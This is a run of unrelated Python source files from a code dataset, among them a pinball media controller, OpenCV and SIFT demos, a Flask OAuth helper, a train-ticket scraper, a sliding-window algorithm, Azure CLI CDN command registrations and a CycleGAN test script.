bcp_trigger(self, name, **kwargs):\n \"\"\"Processes an incoming BCP 'trigger' command.\"\"\"\n self.events.post(name, **kwargs)\n\n def bcp_switch(self, name, state, **kwargs):\n \"\"\"Processes an incoming BCP 'switch' command.\"\"\"\n if int(state):\n self.events.post('switch_' + name + '_active')\n else:\n self.events.post('switch_' + name + '_inactive')\n\n def bcp_get(self, **kwargs):\n \"\"\"Processes an incoming BCP 'get' command.\n\n Note that this media controller doesn't implement the 'get' command at\n this time, but it's included here for completeness since the 'get'\n command is part of the BCP 1.0 specification so we don't want to return\n an error if we receive an incoming 'get' command.\n\n \"\"\"\n pass\n\n def bcp_set(self, **kwargs):\n \"\"\"Processes an incoming BCP 'set' command.\n\n Note that this media controller doesn't implement the 'set' command at\n this time, but it's included here for completeness since the 'set'\n command is part of the BCP 1.0 specification so we don't want to return\n an error if we receive an incoming 'set' command.\n\n \"\"\"\n pass\n\n def bcp_shot(self, name, profile, state):\n \"\"\"The MPF media controller uses triggers instead of shots for its\n display events, so we don't need to pay attention here.\"\"\"\n pass\n\n def bcp_config(self, **kwargs):\n \"\"\"Processes an incoming BCP 'config' command.\"\"\"\n for k, v in kwargs.iteritems():\n if k.startswith('volume_'):\n self.bcp_set_volume(track=k.split('volume_')[1], value=v)\n\n def bcp_timer(self, name, action, **kwargs):\n \"\"\"Processes an incoming BCP 'timer' command.\"\"\"\n pass\n\n def bcp_set_volume(self, track, value):\n \"\"\"Sets the volume based on an incoming BCP 'config' command.\n\n Args:\n track: String name of the track the volume will set.\n value: Float between 0 and 1 which represents the volume level to\n set.\n\n Note: At this time only the master volume can be set with this method.\n\n \"\"\"\n if track == 'master':\n self.sound.set_volume(value)\n\n #if track in self.sound.tracks:\n #self.sound.tracks[track]\n\n # todo add per-track volume support to sound system\n\n def get_debug_status(self, debug_path):\n\n if self.options['loglevel'] > 10 or self.options['consoleloglevel'] > 10:\n return True\n\n class_, module = debug_path.split('|')\n\n try:\n if module in self.active_debugger[class_]:\n return True\n else:\n return False\n except KeyError:\n return False\n\n\n# The MIT License (MIT)\n\n# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n","sub_path":"mpf/media_controller/core/media_controller.py","file_name":"media_controller.py","file_ext":"py","file_size_in_byte":22412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271711424","text":"#!/usr/bin/python\n\nimport cv2\nimport numpy as np\n\ndef process_image(image):\n \n blue=[150,0,0]\n green=[0,200,0]\n white=[220,220,220]\n\n thickness = 2\n line_type = cv2.CV_AA\n\n eye1=(266,266)\n eye2=(330,266)\n eye_radius=20\n\n face_center=(290, 280)\n face_size=(80, 110)\n face_angle = 15;\n\n theText = \"A face and two eyes\"\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_scale = 1\n font_thickness = 1\n font_start=(100, 100)\n\n text_size,base_line = cv2.getTextSize(theText, font, font_scale, font_thickness)\n \n border=(20,20)\n\n p1 = (font_start[0]-border[0],font_start[1]-text_size[1]-border[1])\n p2 = (font_start[0]+text_size[0]+border[0],font_start[1]+border[1])\n\n font_middle=(font_start[0]+text_size[0]/2,font_start[1])\n \n \n\n # Start drawing\n #Eye\n cv2.circle(image, eye1, eye_radius, green, thickness, line_type);\n cv2.circle(image, eye2, eye_radius, green, thickness, line_type);\n #Face\n cv2.ellipse(image, face_center, face_size, face_angle, 0, 360, green, thickness, line_type);\n \n cv2.line(image, font_middle, face_center, blue, thickness, line_type);\n #Rectangle\n cv2.rectangle(image, p1, p2, blue, -1, line_type);\n\n\n #Text\n cv2.putText(image, theText, font_start, font, font_scale, white, thickness, line_type);\n \n\n\ndef display_graphics(image):\n cv2.imshow(\"Image\",image)\n\ndef main():\n \n cv2.namedWindow(\"Image\")\n\n image=cv2.imread(\"lena.jpg\")\n \n process_image(image)\n display_graphics(image)\n\n cv2.imwrite(\"lena_m.jpg\",image)\n \n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n \n main() \n \n","sub_path":"opencv_computer_vision_application_programming/2/2-5-Drawing-Shape/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424379765","text":"\n\nfrom xai.brain.wordbase.verbs._harangue import _HARANGUE\n\n#calss header\nclass _HARANGUES(_HARANGUE, ):\n\tdef __init__(self,): \n\t\t_HARANGUE.__init__(self)\n\t\tself.name = \"HARANGUES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"harangue\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_harangues.py","file_name":"_harangues.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"576311017","text":"# -*- coding: utf-8 -*-\nfrom flask import session, flash, redirect, url_for\nfrom flask.ext.login import login_user\nfrom apps import db\nfrom apps.models import User\n\n\ndef OAuth2RegisterToUser(user_data, type):\n \n user = User.query.filter_by(id=user_data.get('id')).first()\n\n\n if user is None:\n \n if type == 'FACEBOOK':\n user = User(\n id=user_data['id'],\n name=user_data['name'],\n picture=\"http://graph.facebook.com/%s/picture\" % user_data['id'],\n gender=user_data['gender']\n )\n db.session.add(user)\n db.session.commit()\n \n #\n # @users\n #\n users = User.query.filter_by(id=user.id)\n\n if users.count() > 1:\n return 409\n\n user = users.first()\n #\n\n if user:\n if login_user(user):\n return 200\n else:\n return 500\n\n\ndef OAuthSessionPop():\n OAUTH_PROVIDER = ['oauth_token']\n for provider in OAUTH_PROVIDER:\n session.pop(provider, None)\n\n\ndef OAuthRegisterAndLoginRedirect(register_result):\n if register_result == 200:\n flash(u\"로그인에 성공하였습니다.\", \"success\")\n return redirect(url_for('main'))\n elif register_result == 409:\n flash(u\"중복된 사용자 이메일입니다.\", \"warning\")\n return redirect(url_for('login'))\n elif register_result == 500:\n flash(u\"사용자 등록에 실패하였습니다. 다시 시도하여주시기 바랍니다.\", \"error\")\n return redirect(url_for('login'))","sub_path":"core/OAuthManagement.py","file_name":"OAuthManagement.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67851077","text":"#python3.7\r\n#Filename:爬取火车票信息(已知时间和始终站).py\r\n\r\n#后续:文本文件的返回页面设置\r\n#优化:异常处理,搜索时间的设置(当日往后一个月)\r\n\r\nimport requests,openpyxl\r\nimport os,json,re\r\nimport station_name_code\r\n\r\npath = \"C:\\\\Users\\\\15394\\\\Desktop\\\\\"\r\nprint(\"保存在\",path)\r\n\r\ndef getDatas(year,month,date,_from,_to):\r\n headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36\"}\r\n params = [{\r\n \"leftTicketDTO.train_date\":str(year)+\"-\"+str(month)+\"-\"+str(date),\r\n \"leftTicketDTO.from_station\":_from,\r\n \"leftTicketDTO.to_station\":_to,\r\n \"purpose_codes\":\"ADULT\"\r\n }]\r\n url = \"https://kyfw.12306.cn/otn/leftTicket/query\"\r\n for i in params:\r\n res = requests.get(url,params=i)\r\n res = json.loads(res.text)\r\n datas = res[\"data\"][\"result\"]\r\n #print(datas) #页面的所有火车票信息(字符串列表)\r\n return datas\r\n\r\n#对单条信息删选\r\ndef _re(data):\r\n message = data.split(\"|\") #经过拆分可看出“预定”都是在第二个(��引为1)\r\n #print(message)\r\n return message #单条火车信息组成的列表\r\n\r\n#对信息输出\r\ndef prt(mes):\r\n a = mes[3] #车次\r\n b1 = code(mes[4]) #始站(更改为汉字)\r\n b2 = code(mes[5]) #终站(更改为汉字)\r\n b3 = code(mes[6]) #出发站\r\n b4 = code(mes[7]) #到达站\r\n time1 = mes[8] #出发时间\r\n time2 = mes[9] #到达时间\r\n time3 = mes[10] #历时\r\n time4 = mes[13] #日期\r\n c1 = mes[32] #商务座(特等座)\r\n c2 = mes[31] #一等座\r\n c3 = mes[30] #二等座\r\n c4 = mes[21] #高级软卧\r\n c5 = mes[23] #软卧一等卧\r\n c6 = mes[33] #动卧\r\n c7 = mes[28] #硬卧二等卧\r\n c8 = mes[24] #软座\r\n c9 = mes[29] #硬座\r\n c10 = mes[26] #无座\r\n l = [a,b1,b2,b3,b4,time1,time2,time3,time4,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10]\r\n for i in range(len(l)):\r\n if l[i]==\"\":\r\n l[i] = \"无\"\r\n dic = {\"车次\":l[0],\"始站\":l[1],\"终站\":l[2],\"出发站\":l[3],\"到达站\":l[4],\r\n \"出发时间\":l[5],\"到达时间\":l[6],\"历时\":l[7],\"日期\":l[8],\r\n \"商务座\":l[9],\"一等座\":l[10],\"二等座\":l[11],\"高级软卧\":l[12],\"软卧一等卧\":l[13],\r\n \"动卧\":l[14],\"硬卧二等卧\":l[15],\"软座\":l[16],\"硬座\":l[17],\"无座\":l[18]}\r\n list0 = [\"车次:\",l[0],\"始站:\",l[1],\"终站:\",l[2],\"出发站:\",l[3],\"到达站:\",l[4],\r\n \"出发时间:\",l[5],\"到达时间:\",l[6],\"历时:\",l[7],\"日期:\",l[8],\r\n \"商务座:\",l[9],\"一等座:\",l[10],\"二等座:\",l[11],\"高级软卧:\",l[12],\"软卧一等卧:\",l[13],\r\n \"动卧:\",l[14],\"硬卧二等卧:\",l[15],\"软座:\",l[16],\"硬座:\",l[17],\"无座:\",l[18]]\r\n return list0,dic\r\n\r\n#文本返回保存\r\ndef txt_format(l): #文本格式优化\r\n for i in range(1,len(l),2):\r\n l[i] = \"{0:{1}<5}\\t\".format(l[i],chr(12288))\r\n l = \"\".join(l)\r\n return l\r\n\r\ndef _file(m): #保存为txt文件或直接输出\r\n with open(path+\"火车票.txt\",\"a\") as f:\r\n f.write(m)\r\n\r\ndef _excel(l,i): #保存为excel文件\r\n while os.path.exists(path+\"火车票.xlsx\") == False:\r\n wb = openpyxl.Workbook()\r\n sheet = wb.active\r\n sheet.title = \"火车票信息\"\r\n wb.save(path+\"火车票.xlsx\")\r\n wb = openpyxl.load_workbook(path+\"火车票.xlsx\")\r\n #sheet = wb[\"火车票信息:{} 至 {}\".format(_from,_to)]\r\n sheet = wb[\"火车票信息\"]\r\n if sheet[\"A1\"].value == None:\r\n sheet[\"A1\"] = l[0].replace(\":\",\"\")\r\n sheet[\"B1\"] = l[2].replace(\":\",\"\")\r\n sheet[\"C1\"] = l[4].replace(\":\",\"\")\r\n sheet[\"D1\"] = l[6].replace(\":\",\"\")\r\n sheet[\"E1\"] = l[8].replace(\":\",\"\")\r\n sheet[\"F1\"] = l[10].replace(\":\",\"\")\r\n sheet[\"G1\"] = l[12].replace(\":\",\"\")\r\n sheet[\"H1\"] = l[14].replace(\":\",\"\")\r\n sheet[\"I1\"] = l[16].replace(\":\",\"\")\r\n sheet[\"J1\"] = l[18].replace(\":\",\"\")\r\n sheet[\"K1\"] = l[20].replace(\":\",\"\")\r\n sheet[\"L1\"] = l[22].replace(\":\",\"\")\r\n sheet[\"M1\"] = l[24].replace(\":\",\"\")\r\n sheet[\"N1\"] = l[26].replace(\":\",\"\")\r\n sheet[\"O1\"] = l[28].replace(\":\",\"\")\r\n sheet[\"P1\"] = l[30].replace(\":\",\"\")\r\n sheet[\"Q1\"] = l[32].replace(\":\",\"\")\r\n sheet[\"R1\"] = l[34].replace(\":\",\"\")\r\n sheet[\"S1\"] = l[36].replace(\":\",\"\")\r\n i = str(i)\r\n sheet[\"A\"+i] = l[1]\r\n sheet[\"B\"+i] = l[3]\r\n sheet[\"C\"+i] = l[5]\r\n sheet[\"D\"+i] = l[7]\r\n sheet[\"E\"+i] = l[9]\r\n sheet[\"F\"+i] = l[11]\r\n sheet[\"G\"+i] = l[13]\r\n sheet[\"H\"+i] = l[15]\r\n sheet[\"I\"+i] = l[17]\r\n sheet[\"J\"+i] = l[19]\r\n sheet[\"K\"+i] = l[21]\r\n sheet[\"L\"+i] = l[23]\r\n sheet[\"M\"+i] = l[25]\r\n sheet[\"N\"+i] = l[27]\r\n sheet[\"O\"+i] = l[29]\r\n sheet[\"P\"+i] = l[31]\r\n sheet[\"Q\"+i] = l[33]\r\n sheet[\"R\"+i] = l[35]\r\n sheet[\"S\"+i] = l[37]\r\n wb.save(path+\"火车票.xlsx\")\r\n\r\n\r\n#运行顺序\r\ndef go_txt(year,month,date,_from,_to): #保存为txt\r\n datas = getDatas(year,month,date,code(_from),code(_to))\r\n for data in datas:\r\n mes = _re(data)\r\n l = prt(mes)[0]\r\n m = txt_format(l)\r\n print(m,\"\\n\") #返回到屏幕\r\n _file(m) #保存为txt\r\n\r\ndef go_excel(year,month,date,_from,_to): #保存为excel\r\n datas = getDatas(year,month,date,code(_from),code(_to))\r\n i = 2\r\n for data in datas:\r\n mes = _re(data)\r\n l = prt(mes)[0]\r\n _excel(l,i) #保存为excel\r\n i += 2\r\n\r\n#汉字编码转换\r\ndef code(name):\r\n name_code = station_name_code.dic()[0]\r\n code_name = station_name_code.dic()[1]\r\n if name in name_code:\r\n return name_code[name]\r\n elif name in code_name:\r\n return code_name[name]\r\n else:\r\n print(\"站点不存在\")\r\n\r\ndef main():\r\n year=input(\"输入年份(如:2019):\")\r\n month=input(\"输入月份(如:01):\")\r\n date=input(\"输入日期(如:01):\")\r\n _from=input(\"输入出发站(如:北京):\")\r\n _to=input(\"输入到达站(如:北京):\")\r\n choice=int(input(\"返回至屏幕和txt文件输入“0”,返回至excel文件输入“1”:\"))\r\n if choice == 0:\r\n try:\r\n go_txt(year,month,date,_from,_to) #txt文件和(或)返回到屏幕\r\n except:\r\n print(\"未找到\")\r\n else:\r\n try:\r\n go_excel(year,month,date,_from,_to) #excel表格\r\n except:\r\n print(\"未找到\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n print(\"Done\")\r\n","sub_path":"可选日期和始终站/爬取火车票信息(json).py","file_name":"爬取火车票信息(json).py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132805908","text":"# 340. Longest Substring with At Most K Distinct Characters\n# Example 1:\n\n# Input: s = \"eceba\", k = 2\n# Output: 3\n# Explanation: T is \"ece\" which its length is 3.\n# Example 2:\n\n# Input: s = \"aa\", k = 1\n# Output: 2\n# Explanation: T is \"aa\" which its length is 2.\n\nfrom collections import defaultdict\n\n\n# using a dynamic sliding window that expands and contracts\n# update a min length to return each iteration\n\ndef lengthOfLongestSubstringKDistinct(s, k):\n l, r, length, map = 0, 0, 0, defaultdict(int)\n\n for r in range(len(s)):\n # always put the new value in the map. Expand\n map[s[r]] += 1\n\n # contract\n while len(map) > k:\n\n map[s[l]] -= 1\n # if when we contract and remove values if the mapping value is 0 remove it\n if map[s[l]] == 0:\n del map[s[l]]\n l += 1\n\n length = max(length, r-l + 1)\n return length\n\n\nprint(lengthOfLongestSubstringKDistinct(\"eceba\", 2)) # 3\nprint(lengthOfLongestSubstringKDistinct(\"aa\", 1)) # 2\n","sub_path":"SlidingWindow/LongestSubstringWithAtMostKDistinctCharacters.py","file_name":"LongestSubstringWithAtMostKDistinctCharacters.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63602230","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom knack.util import CLIError\n\nfrom azure.cli.core.commands import CliCommandType\n\nfrom ._client_factory import (cf_cdn, cf_custom_domain, cf_endpoints, cf_profiles, cf_origins, cf_resource_usage,\n cf_edge_nodes, cf_waf_policy, cf_waf_rule_set)\n\n\ndef _not_found(message):\n def _inner_not_found(ex):\n from azure.mgmt.cdn.models import ErrorResponseException\n if isinstance(ex, ErrorResponseException) \\\n and ex.response is not None \\\n and ex.response.status_code == 404:\n raise CLIError(message)\n raise ex\n return _inner_not_found\n\n\n_not_found_msg = \"{}(s) not found. Please verify the resource(s), group or it's parent resources \" \\\n \"exist.\"\n\n\n# pylint: disable=too-many-statements\ndef load_command_table(self, _):\n profile_not_found_msg = _not_found_msg.format('Profile')\n endpoint_not_found_msg = _not_found_msg.format('Endpoint')\n cd_not_found_msg = _not_found_msg.format('Custom Domain')\n origin_not_found_msg = _not_found_msg.format('Origin')\n waf_policy_not_found_msg = _not_found_msg.format('WAF Policy')\n\n cdn_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn#CdnManagementClient.{}',\n client_factory=cf_cdn\n )\n\n cdn_endpoints_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#EndpointsOperations.{}',\n client_factory=cf_endpoints,\n exception_handler=_not_found(endpoint_not_found_msg)\n )\n\n cdn_profiles_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#ProfilesOperations.{}',\n client_factory=cf_profiles,\n exception_handler=_not_found(profile_not_found_msg)\n )\n\n cdn_domain_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#CustomDomainsOperations.{}',\n client_factory=cf_custom_domain,\n exception_handler=_not_found(cd_not_found_msg)\n )\n\n cdn_origin_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#OriginsOperations.{}',\n client_factory=cf_origins,\n exception_handler=_not_found(origin_not_found_msg)\n )\n\n cdn_edge_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#EdgeNodesOperations.{}',\n client_factory=cf_edge_nodes\n )\n\n cdn_usage_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#ResourceUsageOperations.{}',\n client_factory=cf_resource_usage\n )\n\n cdn_waf_policy_sdk = CliCommandType(\n operations_tmpl='azure.mgmt.cdn.operations#PoliciesOperations.{}',\n client_factory=cf_waf_policy,\n exception_handler=_not_found(waf_policy_not_found_msg)\n )\n\n with self.command_group('cdn', cdn_sdk) as g:\n g.command('name-exists', 'check_name_availability')\n\n with self.command_group('cdn', cdn_usage_sdk) as g:\n g.command('usage', 'list')\n\n with self.command_group('cdn endpoint', cdn_endpoints_sdk) as g:\n for name in ['start', 'stop', 'delete']:\n g.command(name, name, supports_no_wait=True)\n g.show_command('show', 'get')\n g.command('list', 'list_by_profile')\n g.command('load', 'load_content', supports_no_wait=True)\n g.command('purge', 'purge_content', supports_no_wait=True)\n g.command('validate-custom-domain', 'validate_custom_domain')\n g.custom_command('create', 'create_endpoint', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint',\n supports_no_wait=True)\n g.generic_update_command('update', setter_name='update', setter_arg_name='endpoint_update_properties',\n custom_func_name='update_endpoint',\n doc_string_source='azure.mgmt.cdn.models#EndpointUpdateParameters',\n supports_no_wait=True)\n\n with self.command_group('cdn endpoint waf policy', cdn_endpoints_sdk, is_preview=True) as g:\n g.custom_show_command('show', 'show_endpoint_waf_policy_link', client_factory=cf_endpoints)\n g.custom_command('set', 'set_endpoint_waf_policy_link', client_factory=cf_endpoints)\n g.custom_command('remove', 'remove_endpoint_waf_policy_link', client_factory=cf_endpoints, confirmation=True)\n\n with self.command_group('cdn endpoint rule', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_rule', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_rule', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn endpoint rule condition', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_condition', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_condition', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn endpoint rule action', cdn_endpoints_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.custom_command('add', 'add_action', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n g.custom_command('remove', 'remove_action', client_factory=cf_cdn,\n doc_string_source='azure.mgmt.cdn.models#Endpoint')\n\n with self.command_group('cdn profile', cdn_profiles_sdk) as g:\n g.show_command('show', 'get')\n g.command('usage', 'list_resource_usage')\n g.command('delete', 'delete')\n g.custom_command('list', 'list_profiles', client_factory=cf_cdn)\n g.custom_command('create', 'create_profile', client_factory=cf_cdn)\n g.generic_update_command('update', setter_name='update', custom_func_name='update_profile',\n doc_string_source='azure.mgmt.cdn.models#ProfileUpdateParameters')\n\n with self.command_group('cdn custom-domain', cdn_domain_sdk) as g:\n g.show_command('show', 'get')\n g.command('delete', 'delete')\n g.command('list', 'list_by_endpoint')\n g.custom_command('create', 'create_custom_domain', client_factory=cf_cdn)\n g.custom_command('enable-https', 'enable_custom_https', client_factory=cf_cdn)\n g.command('disable-https', 'disable_custom_https')\n\n with self.command_group('cdn origin', cdn_origin_sdk) as g:\n g.show_command('show', 'get')\n g.command('list', 'list_by_endpoint')\n\n with self.command_group('cdn edge-node', cdn_edge_sdk) as g:\n g.command('list', 'list')\n\n with self.command_group('cdn waf policy', cdn_waf_policy_sdk, is_preview=True) as g:\n g.show_command('show', 'get')\n g.command('list', 'list')\n g.custom_command('set', 'set_waf_policy', client_factory=cf_waf_policy)\n g.command('delete', 'delete', confirmation=True)\n\n with self.command_group('cdn waf policy managed-rule-set', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('add', 'add_waf_policy_managed_rule_set', client_factory=cf_waf_policy)\n g.custom_command('remove',\n 'remove_waf_policy_managed_rule_set',\n client_factory=cf_waf_policy,\n confirmation=True)\n g.custom_command('list', 'list_waf_policy_managed_rule_sets', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_policy_managed_rule_set', client_factory=cf_waf_policy)\n g.custom_command('list-available', 'list_waf_managed_rule_set', client_factory=cf_waf_rule_set)\n\n with self.command_group('cdn waf policy managed-rule-set rule-group-override',\n cdn_waf_policy_sdk,\n is_preview=True) as g:\n g.custom_command('set', 'set_waf_managed_rule_group_override', client_factory=cf_waf_policy)\n g.custom_command('delete',\n 'delete_waf_managed_rule_group_override',\n client_factory=cf_waf_policy,\n confirmation=True)\n g.custom_command('list', 'list_waf_policy_managed_rule_group_overrides', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_managed_rule_group_override', client_factory=cf_waf_policy)\n g.custom_command('list-available', 'list_waf_managed_rule_groups', client_factory=cf_waf_rule_set)\n\n with self.command_group('cdn waf policy custom-rule', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('set', 'set_waf_custom_rule', client_factory=cf_waf_policy)\n g.custom_command('delete', 'delete_waf_custom_rule', client_factory=cf_waf_policy, confirmation=True)\n g.custom_command('list', 'list_waf_custom_rules', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_custom_rule', client_factory=cf_waf_policy)\n\n with self.command_group('cdn waf policy rate-limit-rule', cdn_waf_policy_sdk, is_preview=True) as g:\n g.custom_command('set', 'set_waf_rate_limit_rule', client_factory=cf_waf_policy)\n g.custom_command('delete', 'delete_waf_rate_limit_rule', client_factory=cf_waf_policy, confirmation=True)\n g.custom_command('list', 'list_waf_rate_limit_rules', client_factory=cf_waf_policy)\n g.custom_show_command('show', 'show_waf_rate_limit_rule', client_factory=cf_waf_policy)\n","sub_path":"src/azure-cli/azure/cli/command_modules/cdn/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"145961594","text":"import cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('imageresized_0.jpg')\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\nsift = cv2.xfeatures2d.SIFT_create()\r\ndetector = sift.detect(gray, None)\r\n\r\nkpts, des = sift.compute(gray, detector)\r\n# kpts,des=descriptor.compute(gray,kpts)\r\nim_with_keypoints = cv2.drawKeypoints(gray, kpts, np.array([]), color=255, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\r\n\r\ncv2.imshow(\"Keypoints\", im_with_keypoints)\r\ncv2.waitKey()","sub_path":"odd_pys/keypoints/kp.py","file_name":"kp.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72398077","text":"import os, glob, cv2, time\nfrom options.test_options import TestOptions\nfrom data import create_dataset\nfrom models import create_model\nfrom util.visualizer import save_images\nfrom util import html\nimport numpy as np\nfrom scipy.signal import convolve2d\n\n\ndef MSE(pic1, pic2):\n return np.sum(np.square(pic1 - pic2)) / (pic1.shape[0] * pic1.shape[1])\n\n\ndef matlab_style_gauss2D(shape=(3, 3), sigma=0.5):\n \"\"\"\n 2D gaussian mask - should give the same result as MATLAB's\n fspecial('gaussian',[shape],[sigma])\n \"\"\"\n m, n = [(ss - 1.) / 2. for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n h = np.exp(-(x * x + y * y) / (2. * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n sumh = h.sum()\n if sumh != 0:\n h /= sumh\n return h\n\n\ndef filter2(x, kernel, mode='same'):\n return convolve2d(x, np.rot90(kernel, 2), mode=mode)\n\n\ndef compute_ssim(im1, im2, k1=0.01, k2=0.03, win_size=11, L=255):\n if not im1.shape == im2.shape:\n raise ValueError(\"Input Imagees must have the same dimensions\")\n if len(im1.shape) > 2:\n raise ValueError(\"Please input the images with 1 channel\")\n\n M, N = im1.shape\n C1 = (k1 * L) ** 2\n C2 = (k2 * L) ** 2\n window = matlab_style_gauss2D(shape=(win_size, win_size), sigma=1.5)\n window = window / np.sum(np.sum(window))\n\n if im1.dtype == np.uint8:\n im1 = np.double(im1)\n if im2.dtype == np.uint8:\n im2 = np.double(im2)\n\n mu1 = filter2(im1, window, 'valid')\n mu2 = filter2(im2, window, 'valid')\n mu1_sq = mu1 * mu1\n mu2_sq = mu2 * mu2\n mu1_mu2 = mu1 * mu2\n sigma1_sq = filter2(im1 * im1, window, 'valid') - mu1_sq\n sigma2_sq = filter2(im2 * im2, window, 'valid') - mu2_sq\n sigmal2 = filter2(im1 * im2, window, 'valid') - mu1_mu2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigmal2 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n return np.mean(np.mean(ssim_map))\n\n\nif __name__ == '__main__':\n opt = TestOptions().parse() # get test options\n # opt.epoch = 200\n # hard-code some parameters for test\n opt.num_threads = 0 # test code only supports num_threads = 1\n # opt.batch_size = 1 # test code only supports batch_size = 1\n opt.serial_batches = True # disable data shuffling; comment this line if results on randomly chosen images are needed.\n opt.no_flip = True # no flip; comment this line if results on flipped images are needed.\n opt.load_size = opt.crop_size\n opt.display_id = -1 # no visdom display; the test code saves the results to a HTML file.\n opt.dataset_mode = 'unaligned' + ('_single_dir' if opt.single_dir else '')\n dataset = create_dataset(opt) # create a dataset given opt.dataset_mode and other options\n model = create_model(opt) # create a model given opt.model and other options\n model.setup(opt) # regular setup: load and print networks; create schedulers\n # create a website\n web_dir = os.path.join(opt.results_dir, opt.name, '%s_%s' % (opt.phase, opt.epoch)) # define the website directory\n webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt.name, opt.phase, opt.epoch))\n # test with eval mode. This only affects layers like batchnorm and dropout.\n # For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.\n # For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.\n starttime = time.time()\n lasttime = starttime\n\n if opt.eval:\n model.eval()\n starttime = time.time()\n for i, data in enumerate(dataset):\n if i >= opt.num_test: # only apply our model to opt.num_test images.\n break\n model.set_input(data) # unpack data from data loader\n model.test() # run inference\n visuals = model.get_current_visuals() # get image results\n img_path = model.get_image_paths() # get image paths\n if i % 1 == 0: # save images to an HTML file\n print('processing (%04d)-th image... %s' % (len(img_path) + (i) * opt.batch_size, ''), 'cost',\n time.time() - lasttime, 'seconds')\n lasttime = time.time()\n save_images(webpage, visuals, img_path, aspect_ratio=opt.aspect_ratio, width=opt.display_winsize)\n webpage.save() # save the 